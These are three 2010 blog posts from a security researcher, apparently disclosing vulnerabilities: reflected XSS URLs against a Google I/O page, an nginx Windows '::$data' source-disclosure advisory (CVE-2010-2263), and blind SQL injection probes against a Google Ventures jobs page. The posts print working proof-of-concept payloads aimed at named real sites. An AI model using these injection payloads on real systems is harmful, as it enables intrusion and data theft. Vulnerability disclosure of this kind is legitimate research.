miércoles, 23 de junio de 2010

:::SPAS3C-WV-003:::Google IO XSS/HTML Injection Vulnerability



This post is about a bug discovered in Google IO (XSS/HTML Injection)

Risk: Medium

"Google I/O brings together thousands of developers for two days of deep technical content, focused on building the next generation of web, mobile, and enterprise applications with Google and open web technologies such as Android, Google Chrome, Google APIs, Google Web Toolkit, App Engine, and more."

Source: here

Get var "error" was vulnerable to XSS/HTML code injection but some tags and javascript events were filtered trying to do more difficult the explotation.
Also i noticed that viewing source code, error var triggered a SQL error, so I tried to make a SQL Injection but no worked.

Proof of concept:

Indirect. Needed user interaction (event JavaScript: onmouseout) -> https://www.google-io.com/2010/index.cfm?fuseaction=reg.ReturnLogin&error=36%22%3E%3Ca%20href=%22http://www.malware.es%22%20onmouseout=%22alert%281%29%22%3EHOLA%20GOOGLE%3C/a%3E


Fig.1: XSS (Indirect) and HTML Injection.

Direct. Not needed user interaction (event JavaScript: onerror) -> https://www.google-io.com/2010/index.cfm?fuseaction=reg.ReturnLogin&error=36%22%3E%3Ch1%3E%3Cimg%20src=%22pepe.jpg%22%20onerror=%22alert%281%29%22%3EHI%20GOOGLE%20SECURITY%20TEAM%20I%27M%20%20ONLY%20TESTING%3C/a%3E%3C/h1%3E


Fig.2: XSS (Direct) and HTML Injection.

Be safe ;)

viernes, 11 de junio de 2010

:::SPAS3C-SV-001:::NGINX [ENGINE X] SERVER <= 0.7.65 /0.8.39 SOURCE CODE DISCLOSURE/DOWNLOAD VULN. (CVE-2010-2263)

I found this vulnerability one week ago, but I was waiting a fucking CVE number when somebody published a similar advisory without checking. This researcher made a public disclosure in an old release and he also said that it isn't fixed when this is fake (at least Source Code Disclosure/Download got fixed with lastest releases).

Copied from ChangeLog for 0.8.40/0.7.66 (Final releases in stable/development channel):

-------------------------START-COPY-------------------------------

Changes with nginx 0.8.40 07 Jun 2010

*) Security: now nginx/Windows ignores default file stream name.
Thanks to Jose Antonio Vazquez Gonzalez.

*) Feature: the ngx_http_uwsgi_module.
Thanks to Roberto De Ioris.

*) Feature: a "fastcgi_param" directive with value starting with
"HTTP_" overrides a client request header line.

*) Bugfix: the "If-Modified-Since", "If-Range", etc. client request
header lines were passed to FastCGI-server while caching.

*) Bugfix: listen unix domain socket could not be changed during
reconfiguration.
Thanks to Maxim Dounin.

-------------------------END-COPY-------------------------------

But vulnerabilities databases seem that they didn't confirm nothing.

This is my advisory:

-------------------------START-ADVISORY-------------------------------

TITLE: NGINX [ENGINE X]
SERVER <= 0.7.65 (STABLE)/0.8.39 (DEVELOPMENT) SOURCE CODE DISCLOSURE/DOWNLOAD VULNERABILITY TESTED OS: WINDOWS XP SP3/ WINDOWS 7 HOME PREMIUM SEVERITY: HIGH CVE-NUMBER: CVE-2010-2263 IMPACT: READ/DOWNLOAD SOURCE CODE OF WEB APP FILES DISCOVERED DATE: 2010-06-04 FIXED DATE: 2010-06-07 FIXED VERSIONS: NGINX/0.8.40 AND NGINX/0.7.66 DISCOVERED BY: JOSE ANTONIO VAZQUEZ GONZALEZ ======ABOUT APPLICATION======
"nginx [engine x] is a HTTP and reverse proxy server, as well as a mail proxy server written by Igor Sysoev. It has been running for more than five years on many heavily loaded Russian sites including Rambler (RamblerMedia.com). According to Netcraft nginx served or proxied 4.70% busiest sites in April 2010. Here are some of success stories: FastMail.FM, Wordpress.com. The sources are licensed under 2-clause BSD-like license." copied from -> http://nginx.org/en/ [ref-1]

======TESTED VERSIONS=====

Unix versions are not vulnerable (it only affects to NTFS file system)

Windows Stable versions:

nginx/0.7.66 --> Not vulnerable
nginx/0.7.65 --> Vulnerable
nginx/0.7.64 --> Vulnerable
nginx/0.7.63 --> Vulnerable
nginx/0.7.62 --> Vulnerable
nginx/0.7.61 --> Vulnerable
nginx/0.7.60 --> Vulnerable
nginx/0.7.59 --> Vulnerable
nginx/0.7.58 --> Vulnerable
nginx/0.7.56 --> Vulnerable

Windows Development versions:

nginx/0.8.40 --> Not vulnerable
nginx/0.8.39 --> Vulnerable
nginx/0.8.38 --> Vulnerable
nginx/0.8.37 --> Vulnerable
nginx/0.8.36 --> Vulnerable
nginx/0.8.35 --> Vulnerable
nginx/0.8.34 --> Vulnerable
nginx/0.8.33 --> Vulnerable
nginx/0.8.32 --> Vulnerable
nginx/0.8.31 --> Vulnerable
nginx/0.8.30 --> Vulnerable

======DESCRIPTION======

This application was vulnerable to source code disclosure/download vulnerability when it was running in Windows OS (NTFS file system).
App parser couldn't handle ADS (Alternate Data Streams) and it treated a data stream as an usual file. An Attacker could read/download source code of webapps files using default data stream (unnamed): "filename::$data".

This issue is like an old security issue in Microsoft Windows IIS [ref-2].

======PROOF OF CONCEPT======

http://[IP]/[FILE]::$data

======STEPS TO REPRODUCE======

1.- Start the server.

2.- Go to http://127.0.0.1/index.html::$data

3.- Browser requests to download...yes...go to file and open it.

======REFERENCES======

[ref-1] -> http://nginx.org/
[ref-2] -> http://www.microsoft.com/technet/security/bulletin/ms98-003.mspx


======DISCLOSURE TIMELINE======

Standard Time Zone: GMT/UTC + 01:00 hour (Spain/Madrid)

[2010-06-04] => Inicial contact with vendor and sent advisory.
[2010-06-04] => Vendor response and believe that vulnerability got fixed with previous release.
[2010-06-04] => I confirm that nginx is vulnerable in Windows 7 OS.
[2010-06-04] => Vendor will try to see the issue.
[2010-06-04] => Vendor confirms the issue and he will get fixed on Monday.
[2010-06-07] => New releases out.
[2010-06-07] => I sent complete advisory and propose as disclosure date on Wednesday.
[2010-06-10] => Second chance to confirm public disclosure.
[2010-06-10] => Vendor agree.
[2010-06-11] => Forced to public disclosure.

======CREDITS=======

Jose Antonio Vazquez Gonzalez,
Telecom. Engineer & Sec. Researcher.
http://spa-s3c.blogspot.com/

Thanks to Ruben Santamarta (@reversemode) and Jose Maria Alonso (@maligno) for their support in other issues.

-------------------------END-ADVISORY-------------------------------

This is a visual Proof Of Concept:

video

Watch on youtube -> http://www.youtube.com/watch?v=DvQtvV8kQhY

Be good (responsible disclosure) has disadvantages...bye bye my first software advisory :(

Update: Thanks to exploits-db and security-focus because they (will) have updated their databases and (will) have published my advisory.

Be safe ;)

miércoles, 9 de junio de 2010

:::SPAS3C-WV-002:::Google App (Ventures) BSQLi Vulnerability



One month ago, I found serveral vulnerabilities in Google's sites.

These issues got fixed all and I want to say that Google Security Team did a good job and they fixed it soon.

All issues was discovered between 4 May and 9 May (year 2010, of course).

This issue is the most important in my opinion: Blind SQL Injection in googleventures.com

Risk: High

Google Ventures is Google’s venture capital arm.

We do primarily three things:
  1. Seek out the most innovative and interesting entrepreneurs and companies we can find
  2. Perform in-depth due diligence and invest in those we are most excited about
  3. Do everything we can to help those companies succeed
We invest for financial return, across all sectors and in all stages of a company’s growth. We are particularly interested in areas where access to our team, facilities, technology or other resources can help a company become more successful, but we do not limit our investments to those of strategic interest to Google – we look for companies and people that have the best opportunity to create significant, disruptive and innovative ventures.

Source: here

Site was made using PHP+MySQL (some parts) and GET var "jobid" vulnerable to injection of SQL code.

Proofs Of Concept (Searching MySQL version)

Return: 1=1 (True), so MySQL version is 5

Link PoC -> http://jobs.googleventures.com/jobdetail.php?jobid=39109+AND+IF(substring(@@version,1,1)=5,1,0)=1--


Fig. 1: BSQLi. True result.

Return 1=0 (False), so MySQL version isn't 4.

Link PoC -> http://jobs.googleventures.com/jobdetail.php?jobid=39109+AND+IF(substring(@@version,1,1)=4,1,0)=1--


Fig. 2: BSQLi. False result.

Also I tried to get a SQL Injection, with "Union Select" Statement but It didn't work.


Fig. 3: Trying SQL Injection "Union Select". MySQL error.

I didn't want to do a further research because I considered that it was enough.

Be safe ;)